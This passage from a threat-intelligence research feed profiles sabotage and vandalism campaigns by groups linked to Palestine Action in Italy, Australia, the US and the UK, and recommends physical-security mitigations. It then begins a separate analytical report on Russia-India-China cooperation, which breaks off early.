        <p>Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:</p>
        <ul>
          <li>On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including <a href="https://www.instagram.com/reel/DPWT8gQjYO9/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstructing</a> a runway at Pisa International Airport, <a href="https://www.instagram.com/reel/DPWqPwHDX89/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">occupying</a> several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.</li>
          <li>On September 29, 2025, the group <a href="https://www.instagram.com/reel/DPMU7CiDLju/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.</li>
          <li>On September 25, 2025, several of the group’s activists <a href="https://www.instagram.com/reel/DPBW13SjC3F/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">chained</a> themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”</li>
        </ul>
        <h3>Affiliate: Death to Toll (Australia)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_150556c905aaf15c815e6d439844ade4f10514771.png?width=750&amp;format=png&amp;optimize=medium" width="661" height="416" />
        </p>
        <p><em><strong>Figure 8:</strong></em> <em>Death to Toll logo (Source:</em> <em><a href="https://www.instagram.com/p/DMJ89bkP9FP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">Instagram</a>)</em></p>
        <p>“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defence Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.</p>
        <p>The first attack claimed by this group was a <a href="https://www.instagram.com/reel/DCQQoNwNirH/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">sabotage</a> of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an <a href="https://www.instagram.com/p/DDne15_tEvP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstruction</a> of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers <a href="https://www.sydneycriminallawyers.com.au/blog/everything-is-on-the-table-says-direct-action-group-targeting-toll-holdings-for-driving-genocide/">cited</a> Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They have also shared a copy of Palestine Action’s 2023 instructional guide on their website.</p>
        <p>In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:</p>
        <ul>
          <li>On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.</li>
          <li>On August 31, 2025, AVEs <a href="https://www.instagram.com/reel/DO0o6wTD565/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.</li>
          <li>On August 11, 2025, AVEs <a href="https://www.instagram.com/reel/DNPf4cuoxkd/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll <a href="https://www.jpost.com/diaspora/antisemitism/article-864565">confirmed</a> the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.</li>
        </ul>
        <p>Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”</p>
        <h3>Offshoot: Unity of Fields (United States)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18ea20b3f7868e11207e286ab17d6b023d7c636f6.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 9:</strong></em> <em>Unity of Fields logo (Source:</em> <em><a href="https://x.com/unityoffields">Social Media</a>)</em></p>
        <p>Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.</p>
        <p>UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">insight</a> from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.</p>
        <p>From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">leaders</a> between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US <a href="https://www.wmur.com/article/merrimack-new-hampshire-elbit-systems-sentences/62908047">attack</a> on an Elbit facility in Merrimack.</p>
        <p>In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.</p>
        <p>Autonomous pro-Palestinian activists across the US have sent UoF several dozen claims of responsibility for publication, covering operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:</p>
        <ul>
          <li>An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia</li>
          <li>A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California</li>
          <li>A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building</li>
        </ul>
        <p>UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh <a href="https://x.com/callawalsh/status/1950366979233054839">reported</a> on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she <a href="https://x.com/Sobh_festival/status/1945795728795717751">participated</a> in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.</p>
        <h3>Partner: Shut the System (United Kingdom)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a8b8e989596e70bc2cae00253a826090b8f15030.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 10:</strong></em> <em>Shut the System logo (Source:</em> <em><a href="https://x.com/shut_system/photo">Social Media</a>)</em></p>
        <p>Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely <a href="https://x.com/money_rebellion">emerged</a> as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.</p>
        <p>The first reported Shut the System operation <a href="https://realmedia.press/fossil-fuel-insurance-sabotage">took place</a> in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 <a href="https://realmedia.press/fossil-fuel-insurance-sabotage/">communiqué</a>, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 <a href="https://www.insurancebusinessmag.com/us/news/environmental/revealed--top-fossil-fuel-insurers-465650.aspx">article</a> from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action <a href="https://www.bbc.com/news/articles/c1rrzp1qwp1o">conducted</a> a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.</p>
        <p>Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with groups that are almost certainly Palestine Action offshoots. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:</p>
        <ul>
          <li>On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.</li>
          <li>On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”</li>
          <li>On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company <a href="https://www.find-tender.service.gov.uk/Notice/029807-2025?origin=SearchResults&amp;p=2">responsible</a> for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.</li>
        </ul>
        <p>From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber-optic lines. Instructions on Shut the System’s website demonstrate how to identify fiber-optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encouraged activists to use these and other sabotage TTPs to target banks and financial industry entities.</p>
        <h2>Mitigations</h2>
        <p>The decentralized nature of individual Palestine Action cells means that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&amp;W) of planned activities.</p>
        <p>To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.</p>
        <ul>
          <li>Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to identify evolving trends in targeting and TTPs and to assess an organization’s overall risk level.</li>
          <li>Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.</li>
          <li>Integrate this report and other Insikt Group assessments of DVE threat actors’ TTPs and targeting into structured tabletop exercises for physical security teams.</li>
          <li>Review and, where necessary, implement governmental <a href="https://www.osce.org/secretariat/597756">guidelines</a> for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.</li>
          <li>Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.</li>
          <li>Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.</li>
        </ul>
        <h2>Outlook</h2>
        <p>While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.</p>
        <p>Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.</p>
        <p>Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_15526186964d3548d60e4a73cf876721d522ad671.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Implications of Russia-India-China Trilateral Cooperation]]></title>
            <link>https://www.recordedfuture.com/ko/research/implications-of-russia-india-china-trilateral-cooperation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/implications-of-russia-india-china-trilateral-cooperation</guid>
            <pubDate>Wed, 10 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Examines Russia-India-China trilateral cooperation, U.S. tariffs and sanctions, why a formal bloc is unlikely, and implications for governments and business.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.</p>
        <p>United States (US) policy — particularly the level of sanctions the US places on each country — is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.</p>
        <p>The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).</p>
        <p>However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.</p>
        <p>Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.</p>
        <p>Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.</li>
          <li>However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.</li>
          <li>The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.</li>
          <li>An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.</li>
          <li>Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.</li>
        </ul>
        <h2>Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia</h2>
        <p>We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.</p>
        <p>India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– <a href="https://www.livemint.com/economy/trump-tariffs-government-exploring-alternate-export-markets-to-protect-interests-of-farmers-11757323797479.html">necessitates</a> <a href="https://www.reuters.com/business/finance/indias-small-businesses-scramble-cushion-blow-trumps-50-tariffs-2025-08-28/">looking</a> for alternative markets and <a href="https://economictimes.indiatimes.com/news/economy/foreign-trade/indian-exporters-shift-focus-to-new-markets-amid-us-tariff-hike/articleshow/123621635.cms?from=mdr">deepening</a> foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including <a href="https://www.csmonitor.com/World/Asia-South-Central/2025/0930/india-china-trade-tariffs-ports">cultivating</a> its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs <a href="https://www.mea.gov.in/Speeches-Statements.htm?dtl/39945/Statement_by_Official_Spokesperson#:~:text=Media%20Center,on:%206/8/2025">called</a> the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically <a href="https://timesofindia.indiatimes.com/business/india-business/us-tariffs-over-russian-oil-unfair-eam-jaishankar-says-actively-working-on-resolving-issues/articleshow/124320954.cms">highlighted</a> the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. 
China’s <a href="https://www.bloomberg.com/news/articles/2025-09-02/russia-s-oil-exports-swing-to-china-after-india-suffers-us-tariff-hit">increasing</a> oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-us-trade-deal-impact-trump-tariffs-us-supreme-court-125111001525_1.html">monitoring</a> the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely <a href="https://www.lowyinstitute.org/the-interpreter/will-trade-deal-repair-india-us-ties">repair</a>, the deteriorating diplomatic and economic ties between India and the US.</p>
        <p>The US tariffs have likely also <a href="https://www.crisisgroup.org/asia-pacific/south-asia/india-china/india-rekindles-its-china-ties-trumps-tariffs-bite">reinforced</a> an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.</p>
        <p>Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">stated</a> that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin <strong>(Figure 1)</strong> at the SCO Summit sparked concerns over an emergent Russia-India-China troika.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18c4f5e2ffd69ace89bc012728f00a6e81ca819c7.png?width=750&amp;format=png&amp;optimize=medium" width="486" height="441" />
        </p>
        <p><em><strong>Figure 1:</strong> Photo posted by Modi of himself with Putin and Xi at the SCO Summit on August 31, 2025 (Source: Social Media)</em></p>
        <p>The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.</p>
        <h2>Areas of Bilateral Intersection and Divergence Among China, India, and Russia</h2>
        <p>Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.</p>
        <h3>China’s Foreign Policy</h3>
        <p>China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” <a href="https://archive.ph/IpxKT">such as</a> <a href="https://carnegieendowment.org/files/CLM34MS_FINAL.pdf">preserving</a> the CCP’s political power, territorial integrity, and economic development, as well as China’s <a href="https://chinaopensourceobservatory.org/glossary/advancing-towards-the-center-of-the-world-stage">efforts</a> to <a href="https://web.archive.org/web/20250219133111/https://www.fmprc.gov.cn/web/wjbzhd/202501/t20250117_11537992.shtml">shape</a> a “<a href="https://web.archive.org/web/20250310002304/https://www.mfa.gov.cn/eng/wjbzhd/202403/t20240308_11256418.html">multipolar</a>” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main <a href="https://web.archive.org/web/20230325133108/http://hochiminhcity.china-consulate.gov.cn/xwdt/202303/t20230306_11036576.html">perceived</a> <a href="https://archive.ph/5I8B8">threat</a> — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">considers</a> India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.</p>
        <h3>India’s Foreign Policy</h3>
        <p>India almost certainly <a href="https://rsis.edu.sg/rsis-publication/idss/ip25015-understanding-indias-evolving-policy-of-strategic-autonomy/">defines</a> its relationships with China and Russia through its <a href="https://www.mea.gov.in/press-releases.htm?dtl/40072">doctrine</a> of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">founding</a> the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic <a href="https://government.economictimes.indiatimes.com/news/defence/between-empires-indias-diplomatic-balancing-act-with-the-usa-russia-and-china/121914598">balancing</a> <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">act</a> seeking to <a href="https://eastasiaforum.org/2023/03/20/india-in-a-world-of-asymmetrical-multipolarity/">promote</a> an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also <a href="https://indiawrites.org/diplomacy/why-multi-alignment-matters-to-india-explains-jaishankar/">underpinned</a> by a “multi-alignment” policy, which very likely seeks to <a href="https://web.archive.org/web/20250910093650/https://www.thehindu.com/opinion/lead/indias-strategic-autonomy-in-a-multipolar-world/article70016666.ece">promote</a> and <a href="https://www.hudson.org/foreign-policy/indias-multi-alignment-rising-geopolitical-profile-aparna-pande">safeguard</a> India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. 
Consistent with its strategic independence, New Delhi has <a href="https://www.isdp.eu/publication/india-in-a-world-of-asymmetrical-multipolarity/">cultivated</a> its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.</p>
        <h3>Russia’s Foreign Policy</h3>
        <p>Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:</p>
        <p>Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most <a href="https://forbes.ge/en/the-most-sanctioned-countries/">sanctioned</a> state in the world.</p>
        <h3>China-Russia: Strategic Partners in Countering the West</h3>
        <p>In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly between their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– mean these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.</p>
        <h4>Political Dynamics</h4>
